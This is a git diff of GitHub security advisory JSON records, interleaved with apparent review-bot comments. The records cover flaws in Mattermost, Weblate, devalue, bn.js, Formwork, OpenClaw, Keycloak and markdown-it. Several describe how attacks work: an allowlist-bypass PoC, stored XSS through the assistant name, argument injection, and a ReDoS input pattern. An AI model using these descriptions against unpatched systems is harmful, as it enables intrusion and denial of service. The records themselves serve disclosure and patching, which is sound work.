diff --git a/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json b/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
similarity index 53%
rename from advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
rename to advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
index 95e68291c6dcf..2dd1016e60662 100644
--- a/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
+++ b/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
@@ -1,11 +1,12 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2xf7-hmf6-p64j",
- "modified": "2026-02-13T12:31:21Z",
+ "modified": "2026-02-13T20:55:54Z",
 "published": "2026-02-13T12:31:21Z",
 "aliases": [
 "CVE-2026-20796"
 ],
+ "summary": "Mattermost doesn't properly validate channel membership at the time of data retrieval",
 "details": "Mattermost versions 10.11.x <= 10.11.9 fail to properly validate channel membership at the time of data retrieval which allows a deactivated user to learn team names they should not have access to via a race condition in the /common_teams API endpoint.. Mattermost Advisory ID: MMSA-2025-00549",
 "severity": [
 {
@@ -13,12 +14,39 @@
 "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
 }
 ],
- "affected": [],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "10.11.0"
+ },
+ {
+ "fixed": "10.11.10"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 10.11.9"
+ }
+ }
+ ],
 "references": [
 {
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20796"
 },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mattermost/mattermost"
+ },
 {
 "type": "WEB",
 "url": "https://mattermost.com/security-updates"
@@ -29,8 +57,8 @@
 "CWE-367"
 ],
 "severity": "LOW",
- "github_reviewed": false,
- "github_reviewed_at": null,
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:55:54Z",
 "nvd_published_at": "2026-02-13T11:16:10Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json b/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json
new file mode 100644
index 0000000000000..b34cd5da7c006
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json
@@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3288-p39f-rqpv", + "modified": "2026-02-19T15:17:41Z", + "published": "2026-02-19T15:17:41Z", + "aliases": [], + "summary": "Unsoundness in opt-in ARMv8 assembly backend for `keccak`", + "details": "### Summary\n\nThe `asm!` block enabled by the off-by-default `asm` feature, when enabled on ARMv8 targets, misspecified the operand\ntype for all of its operands, using `in` for pointers and values which were subsequently mutated by operations performed\nwithin the assembly block.\n\n### Impact\n\nIt's unclear what practical impact, if any, this actually had. Incorrect operand types are technically undefined\nbehavior, however changing them had no actual impact on the generated assembly for these targets. The possibility still\nexists that it may lead to potential memory safety or other issues on hypothetical future versions of rustc.\n\n### Mitigation\n\nThe operand types were changed from `in` to `inout`, and the impacted versions of the `keccak` crate were yanked.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "keccak" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.1.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/RustCrypto/sponges/pull/101" + }, + { + "type": "WEB", + "url": "https://github.com/RustCrypto/sponges/commit/7ac1920198ebb7d0192e6d2c3581e15b38a6e0e5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/RustCrypto/sponges" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2026-0012.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-758" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T15:17:41Z", + "nvd_published_at": null + } +} \ No newline at end 
of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json b/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json new file mode 100644 index 0000000000000..e1ac8f6e24636 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33fm-6gp7-4p47", + "modified": "2026-02-19T20:30:31Z", + "published": "2026-02-17T16:37:55Z", + "aliases": [ + "CVE-2026-24126" + ], + "summary": "Weblate has an argument injection in management console", + "details": "### Impact\nThe SSH management console did not validate the passed input while adding the SSH host key, which could lead to an argument injection to `ssh-add`.\n\n### Patches\n* https://github.com/WeblateOrg/weblate/pull/17722\n\n### Workarounds\nProperly limit access to the management console.\n\n### References\nThis issue was reported to us by [alexb_616](https://hackerone.com/alexb_616) via HackerOne.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Weblate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.16.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-33fm-6gp7-4p47" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24126" + }, + { + "type": "WEB", + "url": "https://github.com/WeblateOrg/weblate/pull/17722" + }, + { + "type": "WEB", + "url": "https://github.com/WeblateOrg/weblate/commit/78773cc141ce0a97900c11341e6cf856451395fd" + }, + { + "type": "PACKAGE", + "url": "https://github.com/WeblateOrg/weblate" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-88" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T16:37:55Z", + "nvd_published_at": "2026-02-19T00:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json b/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json new file mode 100644 index 0000000000000..8fc9c6ffc6896 
--- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33hq-fvwr-56pm", + "modified": "2026-02-19T20:29:30Z", + "published": "2026-02-19T20:29:30Z", + "aliases": [], + "summary": "devalue affected by CPU and memory amplification from sparse arrays", + "details": "Under certain circumstances, serializing sparse arrays using `uneval` or `stringify` could cause CPU and/or memory exhaustion. When this occurs on the server, it results in a DoS. This is extremely difficult to take advantage of in practice, as an attacker would have to manage to create a sparse array on the server — which is impossible in every mainstream wire format — and then that sparse array would have to be run through `uneval` or `stringify`.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "devalue" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.6.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.6.2" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/security/advisories/GHSA-33hq-fvwr-56pm" + }, + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/commit/819f1ac7475ab37547645cfb09bf2f678a799cf0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sveltejs/devalue" + }, + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/releases/tag/v5.6.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:29:30Z", + "nvd_published_at": null + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json b/advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json new file mode 100644 index 0000000000000..0f3179a684a60 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json 
@@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33rq-m5x2-fvgf", + "modified": "2026-02-17T21:37:55Z", + "published": "2026-02-17T21:37:55Z", + "aliases": [], + "summary": "OpenClaw Twitch allowFrom is not enforced in optional plugin, unauthorized chat users can trigger agent pipeline", + "details": "### Summary\n\nIn the optional Twitch channel plugin (`extensions/twitch`), `allowFrom` is documented as a hard allowlist of Twitch user IDs, but it was not enforced as a hard gate. If `allowedRoles` is unset or empty, the access control path defaulted to allow, so any Twitch user who could mention the bot could reach the agent dispatch pipeline.\n\n**Scope note:** This only affects deployments that installed and enabled the Twitch plugin. Core OpenClaw installs that do not install/enable the Twitch plugin are not impacted.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `>= 2026.1.29, < 2026.2.1`\n- Fixed: `>= 2026.2.1`\n\n### Details\n\nAffected component: Twitch plugin access control (`extensions/twitch/src/access-control.ts`).\n\nProblematic logic in `checkTwitchAccessControl()`:\n\n- When `allowFrom` was configured, the code returned `allowed: true` for members but did not return `allowed: false` for non-members, so execution fell through.\n- If `allowedRoles` was unset or empty, the function returned `allowed: true` by default, even when `allowFrom` was configured.\n\n### Proof of Concept (PoC)\n\n1. Install and enable the Twitch plugin.\n2. Configure an `allowFrom` list, but do not set `allowedRoles` (or set it to an empty list).\n3. From a different Twitch account whose user ID is NOT in `allowFrom`, send a message that mentions the bot (for example `@ hello`).\n4. Observe the message is processed and can trigger agent dispatch/replies despite not being allowlisted.\n\n### Impact\n\nAuthorization bypass for operators who relied on `allowFrom` to restrict who can invoke the bot in Twitch chat. 
Depending on configuration (tools, routing, model costs), this could lead to unintended actions/responses and resource or cost exhaustion.\n\n### Fix Commit(s)\n\n- `8c7901c984866a776eb59662dc9d8b028de4f0d0`\n\n### Workaround\n\nUpgrade to `openclaw >= 2026.2.1`.\n\nThanks @MegaManSec (https://joshua.hu) of [AISLE Research Team](https://aisle.com/) for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.29" + }, + { + "fixed": "2026.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-33rq-m5x2-fvgf" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/8c7901c984866a776eb59662dc9d8b028de4f0d0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:37:55Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json new file mode 100644 index 0000000000000..d93d859f2120c --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json 
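Review bot: The `### Workaround` section in `details` only repeats the upgrade instruction already given under `Fixed`, so operators who cannot move to `2026.2.1` immediately get no mitigation, although the advisory's own `### Details` bullets imply one: with a non-empty `allowedRoles` the default-allow branch is not reached, so at least restricting the fall-through to configured roles, or disabling the optional Twitch plugin, would belong there (hedged, since the exact role-check behaviour is only summarised here). Step 3 of the PoC reads "(for example `@ hello`)", which looks like a `<bot>` placeholder stripped on export; `@<bot-username> hello` (constructed placeholder) would make the step readable again. The enclosing file is a single JSON document added whole by this hunk, so both fixes are edits to the `details` string.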
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34p4-7w83-35g2", + "modified": "2026-02-23T22:27:29Z", + "published": "2026-02-19T20:31:07Z", + "aliases": [ + "CVE-2026-27198" + ], + "summary": "Formwork Improperly Managed Privileges in User creation", + "details": "### Summary\n\nThe application fails to properly enforce role-based authorization during account creation. Although the system validates that the specified role exists, it does not verify whether the current user has sufficient privileges to assign highly privileged roles such as admin. As a result, an authenticated user with the editor role can create a new account with administrative privileges, leading to full administrative access and complete compromise of the CMS.\n\n### Impact\n\nSuccessful exploitation allows an attacker to:\n- Gain full administrative control over the CMS.\n- Access all site data and user information. \n- Modify system configuration and security settings.\n- Create, modify, or delete any user account, including legitimate administrators.\n\n### Patches\n\n[Formwork 2.3.4](https://github.com/getformwork/formwork/releases/tag/2.3.4) properly assigns roles on user creation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "getformwork/formwork" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.3.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.3.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/security/advisories/GHSA-34p4-7w83-35g2" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27198" + }, + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/commit/19390a0b408e084bdef86f3581e050f3ee51e7cd" + }, + { + "type": "PACKAGE", + 
"url": "https://github.com/getformwork/formwork" + }, + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/releases/tag/2.3.4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:31:07Z", + "nvd_published_at": "2026-02-21T06:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json new file mode 100644 index 0000000000000..a03ceb51fe956 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json 
@@ -0,0 +1,89 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-378v-28hj-76wf",
+ "modified": "2026-02-20T21:18:31Z",
+ "published": "2026-02-20T06:30:39Z",
+ "aliases": [
+ "CVE-2026-2739"
+ ],
+ "summary": "bn.js affected by an infinite loop",
+ "details": "This affects versions of the package bn.js before 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "bn.js"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "5.2.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2739"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/indutny/bn.js/issues/186"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/indutny/bn.js/issues/316"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/indutny/bn.js/pull/317"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/indutny/bn.js/commit/33df26b5771e824f303a79ec6407409376baa64b"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/Kr0emer/02370d18328c28b5dd7f9ac880d22a91"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/indutny/bn.js"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/indutny/bn.js/releases/tag/v5.2.3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.snyk.io/vuln/SNYK-JS-BNJS-15274301"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-835"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-20T21:18:31Z",
+ "nvd_published_at": "2026-02-20T05:17:53Z"
+ }
+}
\ No newline at end of file
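Review bot: Both `severity` vectors rate availability as Low (`A:L` in the 3.1 vector, `VA:L` in the 4.0 vector) while `details` says the affected methods "enter an infinite loop, hanging the process indefinitely"; a hang of the whole process is usually scored `A:H`/`VA:H`, so either the vectors or the wording should be reconciled. If the scores deliberately follow the NVD and Snyk assessments listed under `references`, a short clause in `details` such as `severity follows the NVD assessment` would make that traceable. The `details` text also never says how an attacker reaches `maskn(0)`, which is the precondition the `AV:N/PR:N` rating assumes; one sentence on the entry point (untrusted input flowing into the mask width) would let readers judge whether the network vector applies to their use.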
diff --git a/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json new file mode 100644 index 0000000000000..15ac4ab2878ea --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json 
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-37gc-85xm-2ww6", + "modified": "2026-02-20T16:47:40Z", + "published": "2026-02-18T22:44:33Z", + "aliases": [ + "CVE-2026-27009" + ], + "summary": "OpenClaw affected by Stored XSS in Control UI via unsanitized assistant name/avatar in inline script injection", + "details": "## Summary\nStored XSS in the OpenClaw Control UI when rendering assistant identity (name/avatar) into an inline `` could break out of the script tag and execute attacker-controlled JavaScript in the Control UI origin.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.14`\n- Fixed in: `>= 2026.2.15` (next release; fix is already merged on `main`)\n\n## Details\nThe gateway Control UI HTML response previously injected `assistantName` and `assistantAvatar` directly into an inline `` from terminating the script element, enabling stored XSS if an operator/admin sets the assistant identity to a malicious string.\n\nOpenClaw’s Control UI is intended for local use only (see `SECURITY.md`); this advisory’s CVSS reflects a loopback-only/local-access deployment assumption.\n\n## Impact\nAn attacker with the ability to set assistant identity values (config or agent identity) could cause JavaScript execution for Control UI visitors, enabling token/session theft and privileged actions in the UI.\n\n## Fix\n- Removed inline script injection and serve bootstrap config from a JSON endpoint.\n- Added a restrictive Content Security Policy for the Control UI (`script-src 'self'`, no inline scripts).\n\n## Fix Commit(s)\n- `adc818db4a4b3b8d663e7674ef20436947514e1b`\n- `3b4096e02e7e335f99f5986ec1bd566e90b14a7e`\n\n## Release Process Note\nThis advisory pre-sets the patched version to the planned next release (`2026.2.15`). 
Once that version is published to npm, this advisory can be published without further edits.\n\nThanks @Adam55A-code for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37gc-85xm-2ww6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27009" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/3b4096e02e7e335f99f5986ec1bd566e90b14a7e" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/adc818db4a4b3b8d663e7674ef20436947514e1b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:44:33Z", + "nvd_published_at": "2026-02-20T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json b/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json index 65e255a2c2b57..3979b68093b3c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json +++ b/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-37gf-gmxv-74wv", - "modified": "2026-02-10T18:35:15Z", + "modified": "2026-02-13T21:49:42Z", "published": "2026-02-09T21:31:03Z", "aliases": [ "CVE-2026-1486" 
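Review bot: The `details` string of GHSA-37gc-85xm-2ww6 has two empty backtick spans — "into an inline `` could break out of the script tag" and "directly into an inline `` from terminating the script element" — where the `<script>` token inside the backticks was evidently stripped as HTML on export, so neither sentence parses any more; rewording to `inline script element` / `inline script block` keeps the meaning without relying on a literal tag surviving export. The `## Release Process Note` paragraph ("This advisory pre-sets the patched version to the planned next release … can be published without further edits") is pre-publication housekeeping that is stale in a record that is now published with `fixed: "2026.2.15"` and a release-tag reference, and the same stale paragraph appears in GHSA-3fqr-4cg8-h96q (the hunk ending at L104). The trailing keycloak hunk on this line is a `modified` timestamp bump only and needs no change.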
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "26.5.0"
 },
 {
 "fixed": "26.5.3"
@@ -33,6 +33,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.keycloak:keycloak-services"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "26.4.9"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -52,6 +71,10 @@
 "type": "WEB",
 "url": "https://github.com/keycloak/keycloak/commit/176dc8902ce552056d3648c4601d519afc6fb043"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/keycloak/keycloak/commit/8316e8538f0037d9f998181e73122cff93a94035"
+ },
 {
 "type": "WEB",
 "url": "https://access.redhat.com/errata/RHSA-2026:2365"
diff --git a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
similarity index 67%
rename from advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
rename to advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
index 89a716520ae70..8d068ccd0ebf8 100644
--- a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
+++ b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json
@@ -1,11 +1,12 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-38c4-r59v-3vqw",
- "modified": "2026-02-12T06:30:13Z",
+ "modified": "2026-02-13T20:04:39Z",
 "published": "2026-02-12T06:30:13Z",
 "aliases": [
 "CVE-2026-2327"
 ],
+ "summary": "markdown-it is has a Regular Expression Denial of Service (ReDoS)",
 "details": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.",
 "severity": [
 {
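Review bot: The `package.name` of the first `affected` entry lies above the `@@ -25,7 +25,7 @@` hunk, so it is not visible whether narrowing it from `"introduced": "0"` to `"introduced": "26.5.0"` is paired with the new `org.keycloak:keycloak-services` entry (`0` → `fixed: "26.4.9"`) for the same artifact. If both entries name the same artifact the pair now models the 26.4.x and 26.5.x release lines correctly; if the first entry is a different artifact, the narrowing silently drops every pre-26.5.0 version of it from the affected set and that artifact needs its own `< 26.4.9` entry. A `database_specific.last_known_affected_version_range` on the new entry, as the new-file advisories in this commit carry, would make the pairing explicit, and the RHSA reference in the last hunk is the place to confirm the backport version.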
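Review bot: The added `summary` reads `markdown-it is has a Regular Expression Denial of Service (ReDoS)`, a stray `is`; it should be `"summary": "markdown-it has a Regular Expression Denial of Service (ReDoS)"`. Since this commit is what moves the record from `unreviewed` to `github-reviewed`, the summary becomes the line consumers display, so the typo is worth fixing in the same change that flips `github_reviewed`.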
@@ -14,10 +15,30 @@
 },
 {
 "type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "markdown-it"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "13.0.0"
+ },
+ {
+ "fixed": "14.1.1"
+ }
+ ]
+ }
+ ]
 }
 ],
- "affected": [],
 "references": [
 {
 "type": "ADVISORY",
@@ -31,9 +52,13 @@
 "type": "WEB",
 "url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917"
 },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/markdown-it/markdown-it"
+ },
 {
 "type": "WEB",
- "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs%23L33"
+ "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs#L33"
 },
 {
 "type": "WEB",
@@ -45,8 +70,8 @@
 "CWE-1333"
 ],
 "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:04:39Z",
 "nvd_published_at": "2026-02-12T06:16:02Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json b/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json
new file mode 100644
index 0000000000000..1bdceda443b82
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json
